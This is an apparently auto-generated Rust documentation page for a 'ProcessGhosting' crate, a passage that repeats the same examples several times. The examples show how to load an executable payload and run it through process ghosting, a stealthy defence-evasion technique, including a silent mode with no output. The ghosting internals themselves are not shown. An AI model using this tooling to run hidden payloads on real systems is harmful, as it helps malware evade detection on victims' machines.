114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn x64(self) -> Self
pub fn x64(self) -> Self
Set x64 architecture
Examples found in repository?
examples/silent_mode.rs (line 19)
6fn main() {
7 // No init() call = no banner
8
9 let payload = match std::fs::read("payload.exe") {
10 Ok(p) => p,
11 Err(_) => {
12 // Silent failure - no output
13 std::process::exit(1);
14 }
15 };
16
17 // Silent execution - no output at all
18 let result = GhostingBuilder::new(&payload)
19 .x64()
20 .silent() // Disable all output
21 .execute();
22
23 // Exit with appropriate code
24 std::process::exit(if result.is_ok() { 0 } else { 1 });
25}More examples
examples/from_file.rs (line 26)
7fn main() {
8 init();
9
10 println!("[*] From File Example\n");
11
12 // Get file path from command line or use default
13 let args: Vec<String> = env::args().collect();
14 let file_path = if args.len() > 1 {
15 &args[1]
16 } else {
17 "payload.exe"
18 };
19
20 println!("[*] Loading payload from: {}", file_path);
21
22 // Use from_file builder method
23 match GhostingBuilder::from_file(file_path) {
24 Ok(builder) => {
25 let result = builder
26 .x64()
27 .with_logging()
28 .execute();
29
30 match result {
31 Ok(_) => println!("\n[+] Success!"),
32 Err(e) => eprintln!("\n[-] Failed: {}", e),
33 }
34 }
35 Err(e) => {
36 eprintln!("[-] Failed to load file: {}", e);
37 }
38 }
39}examples/basic_usage.rs (line 21)
6fn main() {
7 // Initialize library (prints banner)
8 init();
9
10 println!("[*] Basic Usage Example\n");
11
12 // Read payload from file
13 let payload_path = "payload.exe";
14
15 match std::fs::read(payload_path) {
16 Ok(payload) => {
17 println!("[+] Loaded payload: {} bytes", payload.len());
18
19 // Execute ghosting
20 let result = GhostingBuilder::new(&payload)
21 .x64() // Target x64 architecture
22 .with_logging() // Enable verbose output
23 .execute();
24
25 match result {
26 Ok(_) => println!("\n[+] Process ghosting completed successfully!"),
27 Err(e) => eprintln!("\n[-] Process ghosting failed: {}", e),
28 }
29 }
30 Err(e) => {
31 eprintln!("[-] Failed to read payload file '{}': {}", payload_path, e);
32 eprintln!(" Please provide a valid PE executable.");
33 }
34 }
35}examples/error_handling.rs (line 30)
6fn main() {
7 init();
8
9 println!("[*] Error Handling Example\n");
10
11 // Test 1: Invalid file
12 println!("[Test 1] Loading non-existent file:");
13 match GhostingBuilder::from_file("nonexistent.exe") {
14 Ok(_) => println!(" Unexpected success"),
15 Err(e) => println!(" Expected error: {}", e),
16 }
17 println!();
18
19 // Test 2: Invalid hex string
20 println!("[Test 2] Parsing invalid hex:");
21 match parse_hex_string("ZZZZ") {
22 Ok(_) => println!(" Unexpected success"),
23 Err(e) => println!(" Expected error: {}", e),
24 }
25 println!();
26
27 // Test 3: Invalid PE (not MZ header)
28 println!("[Test 3] Executing invalid PE:");
29 let invalid_pe = vec![0x00, 0x00, 0x00, 0x00]; // Not MZ
30 match GhostingBuilder::new(&invalid_pe).x64().execute() {
31 Ok(_) => println!(" Unexpected success"),
32 Err(e) => println!(" Expected error: {}", e),
33 }
34 println!();
35
36 // Test 4: Empty payload
37 println!("[Test 4] Empty payload:");
38 match GhostingBuilder::new(&[]).x64().execute() {
39 Ok(_) => println!(" Unexpected success"),
40 Err(e) => println!(" Expected error: {}", e),
41 }
42 println!();
43
44 // Test 5: Truncated PE
45 println!("[Test 5] Truncated PE (only MZ header):");
46 let truncated_pe = vec![0x4D, 0x5A]; // Just MZ
47 match GhostingBuilder::new(&truncated_pe).x64().execute() {
48 Ok(_) => println!(" Unexpected success"),
49 Err(e) => println!(" Expected error: {}", e),
50 }
51 println!();
52
53 println!("[*] Error handling tests complete.");
54}examples/full_demo.rs (line 81)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn x86(self) -> Self
pub fn x86(self) -> Self
Set x86 architecture
Examples found in repository?
examples/full_demo.rs (line 117)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn with_logging(self) -> Self
pub fn with_logging(self) -> Self
Enable verbose output
Examples found in repository?
examples/from_file.rs (line 27)
7fn main() {
8 init();
9
10 println!("[*] From File Example\n");
11
12 // Get file path from command line or use default
13 let args: Vec<String> = env::args().collect();
14 let file_path = if args.len() > 1 {
15 &args[1]
16 } else {
17 "payload.exe"
18 };
19
20 println!("[*] Loading payload from: {}", file_path);
21
22 // Use from_file builder method
23 match GhostingBuilder::from_file(file_path) {
24 Ok(builder) => {
25 let result = builder
26 .x64()
27 .with_logging()
28 .execute();
29
30 match result {
31 Ok(_) => println!("\n[+] Success!"),
32 Err(e) => eprintln!("\n[-] Failed: {}", e),
33 }
34 }
35 Err(e) => {
36 eprintln!("[-] Failed to load file: {}", e);
37 }
38 }
39}More examples
examples/basic_usage.rs (line 22)
6fn main() {
7 // Initialize library (prints banner)
8 init();
9
10 println!("[*] Basic Usage Example\n");
11
12 // Read payload from file
13 let payload_path = "payload.exe";
14
15 match std::fs::read(payload_path) {
16 Ok(payload) => {
17 println!("[+] Loaded payload: {} bytes", payload.len());
18
19 // Execute ghosting
20 let result = GhostingBuilder::new(&payload)
21 .x64() // Target x64 architecture
22 .with_logging() // Enable verbose output
23 .execute();
24
25 match result {
26 Ok(_) => println!("\n[+] Process ghosting completed successfully!"),
27 Err(e) => eprintln!("\n[-] Process ghosting failed: {}", e),
28 }
29 }
30 Err(e) => {
31 eprintln!("[-] Failed to read payload file '{}': {}", payload_path, e);
32 eprintln!(" Please provide a valid PE executable.");
33 }
34 }
35}examples/architecture_selection.rs (line 45)
7fn main() {
8 init();
9
10 println!("[*] Architecture Selection Example\n");
11
12 let args: Vec<String> = env::args().collect();
13
14 // Parse arguments
15 let (file_path, arch) = if args.len() >= 3 {
16 let arch = match args[2].to_lowercase().as_str() {
17 "x86" | "32" | "i386" => Architecture::X86,
18 "x64" | "64" | "amd64" => Architecture::X64,
19 _ => {
20 eprintln!("[-] Unknown architecture: {}", args[2]);
21 eprintln!(" Use: x86, x64, 32, or 64");
22 return;
23 }
24 };
25 (args[1].as_str(), arch)
26 } else if args.len() == 2 {
27 (args[1].as_str(), Architecture::X64) // Default to x64
28 } else {
29 println!("Usage: {} <payload.exe> [arch]", args[0]);
30 println!();
31 println!("Architectures:");
32 println!(" x86, 32, i386 - 32-bit");
33 println!(" x64, 64, amd64 - 64-bit (default)");
34 return;
35 };
36
37 println!("[*] File: {}", file_path);
38 println!("[*] Architecture: {}", arch);
39 println!();
40
41 match GhostingBuilder::from_file(file_path) {
42 Ok(builder) => {
43 let result = builder
44 .architecture(arch)
45 .with_logging()
46 .execute();
47
48 match result {
49 Ok(_) => println!("\n[+] Success!"),
50 Err(e) => eprintln!("\n[-] Failed: {}", e),
51 }
52 }
53 Err(e) => eprintln!("[-] Error: {}", e),
54 }
55}examples/full_demo.rs (line 82)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
124 println!(" .architecture(X64) -> {}\n", arch_config.architecture);
125
126 // 2.5 Verbose control
127 println!("[2.5] Verbose control:");
128
129 let verbose = GhostingBuilder::new(&[0x4D, 0x5A])
130 .with_logging()
131 .build();
132 println!(" .with_logging() -> verbose: {}", verbose.verbose);
133
134 let silent = GhostingBuilder::new(&[0x4D, 0x5A])
135 .silent()
136 .build();
137 println!(" .silent() -> verbose: {}\n", silent.verbose);
138
139 // ========================================
140 // SECTION 3: QUICK FUNCTIONS
141 // ========================================
142 println!("┌────────────────────────────────────────────┐");
143 println!("│ Section 3: Quick Functions │");
144 println!("└────────────────────────────────────────────┘\n");
145
146 println!("[3.1] Available quick functions:");
147 println!(" ghost_payload(&bytes) - Execute from bytes");
148 println!(" ghost_payload_file(path) - Execute from file");
149 println!(" ghost_payload_hex(hex_str) - Execute from hex string\n");
150
151 // ========================================
152 // SECTION 4: EXECUTION (DISABLED BY DEFAULT)
153 // ========================================
154 println!("┌────────────────────────────────────────────┐");
155 println!("│ Section 4: Execution Demo │");
156 println!("└────────────────────────────────────────────┘\n");
157
158 println!("[4.1] To execute process ghosting:");
159 println!();
160 println!(" // Method 1: Builder pattern");
161 println!(" GhostingBuilder::from_file(\"payload.exe\")?");
162 println!(" .x64()");
163 println!(" .with_logging()");
164 println!(" .execute()?;");
165 println!();
166 println!(" // Method 2: Quick function");
167 println!(" ghost_payload_file(\"payload.exe\")?;");
168 println!();
169 println!(" // Method 3: From embedded bytes");
170 println!(" const PAYLOAD: &[u8] = include_bytes!(\"payload.exe\");");
171 println!(" ghost_payload(PAYLOAD)?;");
172 println!();
173
174 // Uncomment below to actually execute
175 /*
176 println!("[4.2] Executing ghosting...\n");
177
178 match GhostingBuilder::from_file("your_payload.exe") {
179 Ok(builder) => {
180 match builder.x64().with_logging().execute() {
181 Ok(_) => println!("\n[+] Ghosting successful!"),
182 Err(e) => println!("\n[-] Ghosting failed: {}", e),
183 }
184 }
185 Err(e) => println!("[-] Failed to load payload: {}", e),
186 }
187 */
188
189 println!("┌────────────────────────────────────────────┐");
190 println!("│ Demo Complete │");
191 println!("└────────────────────────────────────────────┘\n");
192}Sourcepub fn silent(self) -> Self
pub fn silent(self) -> Self
Disable verbose output (silent mode)
Examples found in repository?
examples/silent_mode.rs (line 20)
6fn main() {
7 // No init() call = no banner
8
9 let payload = match std::fs::read("payload.exe") {
10 Ok(p) => p,
11 Err(_) => {
12 // Silent failure - no output
13 std::process::exit(1);
14 }
15 };
16
17 // Silent execution - no output at all
18 let result = GhostingBuilder::new(&payload)
19 .x64()
20 .silent() // Disable all output
21 .execute();
22
23 // Exit with appropriate code
24 std::process::exit(if result.is_ok() { 0 } else { 1 });
25}More examples
examples/full_demo.rs (line 135)
12fn main() {
13 // ========================================
14 // INITIALIZATION
15 // ========================================
16 init();
17
18 println!("╔════════════════════════════════════════════╗");
19 println!("║ ProcessGhosting Full Demo ║");
20 println!("║ By BlackTechX ║");
21 println!("╚════════════════════════════════════════════╝\n");
22
23 let args: Vec<String> = env::args().collect();
24 let test_file = if args.len() > 1 { &args[1] } else { "C:\\Windows\\System32\\notepad.exe" };
25
26 // ========================================
27 // SECTION 1: HEX UTILITIES
28 // ========================================
29 println!("┌────────────────────────────────────────────┐");
30 println!("│ Section 1: Hex Utilities │");
31 println!("└────────────────────────────────────────────┘\n");
32
33 // 1.1 Parse different hex formats
34 println!("[1.1] Parsing different hex formats:\n");
35
36 let formats = [
37 "4D5A9000",
38 "4D 5A 90 00",
39 "0x4D, 0x5A, 0x90, 0x00",
40 "\\x4D\\x5A\\x90\\x00",
41 ];
42
43 for fmt in &formats {
44 match parse_hex_string(fmt) {
45 Ok(bytes) => println!(" '{}' -> {:02X?}", fmt, bytes),
46 Err(e) => println!(" '{}' -> Error: {}", fmt, e),
47 }
48 }
49 println!();
50
51 // 1.2 Convert bytes to hex
52 println!("[1.2] Converting bytes to hex string:");
53 let sample_bytes = vec![0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00];
54 let hex_string = bytes_to_hex_string(&sample_bytes);
55 println!(" {:?} -> {}\n", sample_bytes, hex_string);
56
57 // 1.3 Read file as hex (first 64 bytes)
58 println!("[1.3] Reading file header as hex:");
59 match read_exe_bytes(test_file) {
60 Ok(bytes) => {
61 let preview: Vec<u8> = bytes.iter().take(32).cloned().collect();
62 println!(" File: {}", test_file);
63 println!(" Size: {} bytes", bytes.len());
64 println!(" First 32 bytes: {}", bytes_to_hex_string(&preview));
65 }
66 Err(e) => println!(" Error: {}", e),
67 }
68 println!();
69
70 // ========================================
71 // SECTION 2: BUILDER PATTERNS
72 // ========================================
73 println!("┌────────────────────────────────────────────┐");
74 println!("│ Section 2: Builder Patterns │");
75 println!("└────────────────────────────────────────────┘\n");
76
77 // 2.1 From raw bytes
78 println!("[2.1] Builder from raw bytes:");
79 let sample = vec![0x4D, 0x5A];
80 let config = GhostingBuilder::new(&sample)
81 .x64()
82 .with_logging()
83 .build();
84 println!(" Payload size: {} bytes", config.payload.len());
85 println!(" Architecture: {}", config.architecture);
86 println!(" Verbose: {}\n", config.verbose);
87
88 // 2.2 From file
89 println!("[2.2] Builder from file:");
90 match GhostingBuilder::from_file(test_file) {
91 Ok(builder) => {
92 let config = builder.x64().build();
93 println!(" Loaded: {} bytes\n", config.payload.len());
94 }
95 Err(e) => println!(" Error: {}\n", e),
96 }
97
98 // 2.3 From hex string
99 println!("[2.3] Builder from hex string:");
100 match GhostingBuilder::from_hex_string("0x4D, 0x5A, 0x90, 0x00") {
101 Ok(builder) => {
102 let config = builder.build();
103 println!(" Parsed: {} bytes\n", config.payload.len());
104 }
105 Err(e) => println!(" Error: {}\n", e),
106 }
107
108 // 2.4 Architecture selection
109 println!("[2.4] Architecture selection:");
110
111 let x64_config = GhostingBuilder::new(&[0x4D, 0x5A])
112 .x64()
113 .build();
114 println!(" .x64() -> {}", x64_config.architecture);
115
116 let x86_config = GhostingBuilder::new(&[0x4D, 0x5A])
117 .x86()
118 .build();
119 println!(" .x86() -> {}", x86_config.architecture);
120
121 let arch_config = GhostingBuilder::new(&[0x4D, 0x5A])
122 .architecture(Architecture::X64)
123 .build();
